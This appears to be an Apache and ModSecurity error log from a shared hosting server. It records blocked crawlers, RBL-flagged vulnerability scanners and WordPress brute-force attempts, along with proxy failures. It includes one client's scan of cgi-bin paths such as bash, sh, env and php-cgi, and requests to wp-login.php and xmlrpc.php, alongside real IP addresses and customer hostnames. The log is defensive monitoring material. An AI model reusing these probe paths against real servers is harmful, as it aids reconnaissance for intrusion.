[Tue May 26 13:09:04.343000 2026] [security2:error] [pid 485064:tid 485298] [client 85.208.96.205:22308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/day/2026-05-13/"] [unique_id "ahVOGD9tlF55stOmSqErwAAAAO0"]
[Tue May 26 13:09:04.343114 2026] [security2:error] [pid 485064:tid 485298] [client 85.208.96.205:22308] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/day/2026-05-13/"] [unique_id "ahVOGD9tlF55stOmSqErwAAAAO0"]
[Tue May 26 13:09:05.257939 2026] [proxy:error] [pid 485064:tid 485186] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:05.258006 2026] [proxy_http:error] [pid 485064:tid 485186] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:05.258566 2026] [proxy:error] [pid 485064:tid 485186] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:05.258598 2026] [proxy_http:error] [pid 485064:tid 485186] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:05.383351 2026] [security2:error] [pid 485064:tid 485223] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOGD9tlF55stOmSqErzAAAAKI"]
[Tue May 26 13:09:06.245346 2026] [security2:error] [pid 485064:tid 485214] [client 14.185.186.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOGT9tlF55stOmSqEr6gAAAJk"]
[Tue May 26 13:09:06.857143 2026] [security2:error] [pid 485064:tid 485217] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOGj9tlF55stOmSqEr_wAAAJw"]
[Tue May 26 13:09:07.298184 2026] [security2:error] [pid 485064:tid 485294] [client 103.99.203.146:59865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.203.99.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "juniorwoodies.com"] [uri "/xmlrpc.php"] [unique_id "ahVOGz9tlF55stOmSqEsEAAAAOk"]
[Tue May 26 13:09:07.298369 2026] [security2:error] [pid 485064:tid 485294] [client 103.99.203.146:59865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "juniorwoodies.com"] [uri "/xmlrpc.php"] [unique_id "ahVOGz9tlF55stOmSqEsEAAAAOk"]
[Tue May 26 13:09:07.699930 2026] [proxy:error] [pid 485064:tid 485168] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:07.699986 2026] [proxy_http:error] [pid 485064:tid 485168] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:07.700555 2026] [proxy:error] [pid 485064:tid 485168] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:07.700587 2026] [proxy_http:error] [pid 485064:tid 485168] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:09.730330 2026] [security2:error] [pid 485064:tid 485241] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOHT9tlF55stOmSqEscgAAALQ"]
[Tue May 26 13:09:10.114410 2026] [autoindex:error] [pid 485064:tid 485315] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:10.317218 2026] [autoindex:error] [pid 485064:tid 485305] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:11.129929 2026] [autoindex:error] [pid 485064:tid 485238] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:11.346239 2026] [autoindex:error] [pid 485064:tid 485285] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:11.759477 2026] [autoindex:error] [pid 485064:tid 485311] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:11.961755 2026] [autoindex:error] [pid 485064:tid 485261] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:12.023674 2026] [security2:error] [pid 485064:tid 485258] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOHz9tlF55stOmSqEsxgAAAMU"]
[Tue May 26 13:09:13.354391 2026] [security2:error] [pid 485064:tid 485266] [client 66.249.89.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVOIT9tlF55stOmSqEtCgAAAM0"]
[Tue May 26 13:09:13.360224 2026] [security2:error] [pid 485064:tid 485236] [client 66.249.89.160:61354] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVOIT9tlF55stOmSqEtAwAAAK8"]
[Tue May 26 13:09:14.116837 2026] [proxy:error] [pid 485064:tid 485078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:14.116889 2026] [proxy_http:error] [pid 485064:tid 485078] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:14.117550 2026] [proxy:error] [pid 485064:tid 485078] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:14.117587 2026] [proxy_http:error] [pid 485064:tid 485078] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:14.199936 2026] [proxy:error] [pid 485064:tid 485118] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:14.199998 2026] [proxy_http:error] [pid 485064:tid 485118] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:14.200568 2026] [proxy:error] [pid 485064:tid 485118] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:14.200599 2026] [proxy_http:error] [pid 485064:tid 485118] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:14.299485 2026] [security2:error] [pid 485064:tid 485293] [client 40.77.167.70:28415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.com"] [uri "/jtc-website-disclaimer.php"] [unique_id "ahVOIj9tlF55stOmSqEtMQAAAOg"]
[Tue May 26 13:09:14.469796 2026] [security2:error] [pid 485064:tid 485244] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOIj9tlF55stOmSqEtKwAAALc"]
[Tue May 26 13:09:16.201591 2026] [security2:error] [pid 485064:tid 485255] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOIz9tlF55stOmSqEtcQAAAMI"]
[Tue May 26 13:09:16.425125 2026] [proxy:error] [pid 485064:tid 485105] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:16.425174 2026] [proxy_http:error] [pid 485064:tid 485105] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:16.425762 2026] [proxy:error] [pid 485064:tid 485105] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:16.425795 2026] [proxy_http:error] [pid 485064:tid 485105] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:17.672038 2026] [cgid:error] [pid 485064:tid 485246] [client 185.177.72.30:0] AH01265: stderr from /home2/samayikp/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:09:17.787764 2026] [security2:error] [pid 485064:tid 485161] [remote 47.128.98.40:37600] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ranks-past.php"] [unique_id "ahVOJT9tlF55stOmSqEtzwAAy2A"]
[Tue May 26 13:09:17.888095 2026] [cgid:error] [pid 485064:tid 485277] [client 185.177.72.30:0] AH01265: stderr from /home2/samayikp/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:09:18.670656 2026] [cgid:error] [pid 485064:tid 485286] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/test: script not found or unable to stat
[Tue May 26 13:09:18.866040 2026] [cgid:error] [pid 485064:tid 485203] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/test-cgi: script not found or unable to stat
[Tue May 26 13:09:18.989223 2026] [security2:error] [pid 485064:tid 485314] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOJj9tlF55stOmSqEt7AAAAP0"]
[Tue May 26 13:09:19.061959 2026] [cgid:error] [pid 485064:tid 485254] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/printenv: script not found or unable to stat
[Tue May 26 13:09:19.259119 2026] [cgid:error] [pid 485064:tid 485239] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/php: script not found or unable to stat
[Tue May 26 13:09:19.452702 2026] [cgid:error] [pid 485064:tid 485282] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/php5: script not found or unable to stat
[Tue May 26 13:09:19.645691 2026] [cgid:error] [pid 485064:tid 485304] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/php-cgi: script not found or unable to stat
[Tue May 26 13:09:19.767194 2026] [proxy:error] [pid 485064:tid 485164] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:19.767257 2026] [proxy_http:error] [pid 485064:tid 485164] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:19.767856 2026] [proxy:error] [pid 485064:tid 485164] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:19.767887 2026] [proxy_http:error] [pid 485064:tid 485164] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:19.838826 2026] [cgid:error] [pid 485064:tid 485225] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/perl: script not found or unable to stat
[Tue May 26 13:09:19.918703 2026] [security2:error] [pid 485064:tid 485147] [remote 84.247.181.196:37754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVOJz9tlF55stOmSqEuGgABAlI"]
[Tue May 26 13:09:19.932588 2026] [proxy:error] [pid 485064:tid 485176] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:19.932669 2026] [proxy_http:error] [pid 485064:tid 485176] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:19.933603 2026] [proxy:error] [pid 485064:tid 485176] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:19.933683 2026] [proxy_http:error] [pid 485064:tid 485176] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:20.032340 2026] [cgid:error] [pid 485064:tid 485261] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/python: script not found or unable to stat
[Tue May 26 13:09:20.228190 2026] [cgid:error] [pid 485064:tid 485237] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/bash: script not found or unable to stat
[Tue May 26 13:09:20.364955 2026] [security2:error] [pid 485064:tid 485260] [client 4.201.75.230:13570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.srsglobalsoft.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVOKD9tlF55stOmSqEuOgAAAMc"]
[Tue May 26 13:09:20.424285 2026] [cgid:error] [pid 485064:tid 485279] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/sh: script not found or unable to stat
[Tue May 26 13:09:20.616758 2026] [cgid:error] [pid 485064:tid 485318] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/cgi-bin/env: script not found or unable to stat
[Tue May 26 13:09:20.877671 2026] [security2:error] [pid 485064:tid 485268] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOKD9tlF55stOmSqEuRAAAAM8"]
[Tue May 26 13:09:22.009912 2026] [security2:error] [pid 485064:tid 485163] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/proxy.php"] [unique_id "ahVOKj9tlF55stOmSqEugAAAuGI"]
[Tue May 26 13:09:22.582220 2026] [security2:error] [pid 485064:tid 485141] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/redirect.php"] [unique_id "ahVOKj9tlF55stOmSqEumwAAlUw"]
[Tue May 26 13:09:23.716824 2026] [http2:info] [pid 496740:tid 496740] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:09:23.719655 2026] [security2:error] [pid 485064:tid 485246] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOKz9tlF55stOmSqEuswAAALk"]
[Tue May 26 13:09:25.550170 2026] [security2:error] [pid 496740:tid 496982] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOLevOeft4ltnLrH4ZPAAAAHA"]
[Tue May 26 13:09:26.231739 2026] [security2:error] [pid 496740:tid 496748] [remote 103.230.156.120:42102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVOLevOeft4ltnLrH4ZWgAAIwc"]
[Tue May 26 13:09:26.622315 2026] [autoindex:error] [pid 496740:tid 496983] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:26.701771 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOLuvOeft4ltnLrH4ZcQAAAFM"]
[Tue May 26 13:09:26.822197 2026] [autoindex:error] [pid 496740:tid 496886] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:28.880342 2026] [security2:error] [pid 496740:tid 496897] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVOMOvOeft4ltnLrH4Z0gAAABs"], referer: https://anujtradingco.com
[Tue May 26 13:09:28.990159 2026] [security2:error] [pid 496740:tid 496904] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOMOvOeft4ltnLrH4ZxAAAACI"]
[Tue May 26 13:09:29.136560 2026] [autoindex:error] [pid 496740:tid 496908] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:09:31.357979 2026] [security2:error] [pid 496740:tid 496966] [client 146.174.182.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOMuvOeft4ltnLrH4aIQAAAGA"]
[Tue May 26 13:09:31.628664 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOM-vOeft4ltnLrH4aNAAAAG0"]
[Tue May 26 13:09:33.450861 2026] [security2:error] [pid 496740:tid 496870] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVONevOeft4ltnLrH4ahwAAAAA"]
[Tue May 26 13:09:36.589609 2026] [security2:error] [pid 496740:tid 496830] [remote 174.138.83.43:36792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.83.138.174.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVOOOvOeft4ltnLrH4bBwAAXVk"]
[Tue May 26 13:09:36.616293 2026] [security2:error] [pid 496740:tid 496926] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOOOvOeft4ltnLrH4bAAAAADg"]
[Tue May 26 13:09:36.718263 2026] [security2:error] [pid 496740:tid 496956] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-content/cache/all/index.html"] [unique_id "ahVOOOvOeft4ltnLrH4bEQAAVls"]
[Tue May 26 13:09:37.575648 2026] [security2:error] [pid 496740:tid 496867] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-admin/install.php"] [unique_id "ahVOOevOeft4ltnLrH4bMwAAJX4"]
[Tue May 26 13:09:37.575871 2026] [security2:error] [pid 496740:tid 496907] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-admin/install.php"] [unique_id "ahVOOevOeft4ltnLrH4bMwAAJX4"]
[Tue May 26 13:09:37.742274 2026] [security2:error] [pid 496740:tid 496834] [remote 158.173.20.27:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.20.173.158.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVOOevOeft4ltnLrH4bPgAAB10"]
[Tue May 26 13:09:37.742459 2026] [security2:error] [pid 496740:tid 496877] [client 158.173.20.27:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "kingsclub.in"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVOOevOeft4ltnLrH4bPgAAB10"]
[Tue May 26 13:09:39.316447 2026] [security2:error] [pid 496740:tid 496884] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOOuvOeft4ltnLrH4bbQAAAA4"]
[Tue May 26 13:09:39.571802 2026] [security2:error] [pid 496740:tid 496946] [client 4.194.232.122:50030] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVOO-vOeft4ltnLrH4bgwAAAEw"]
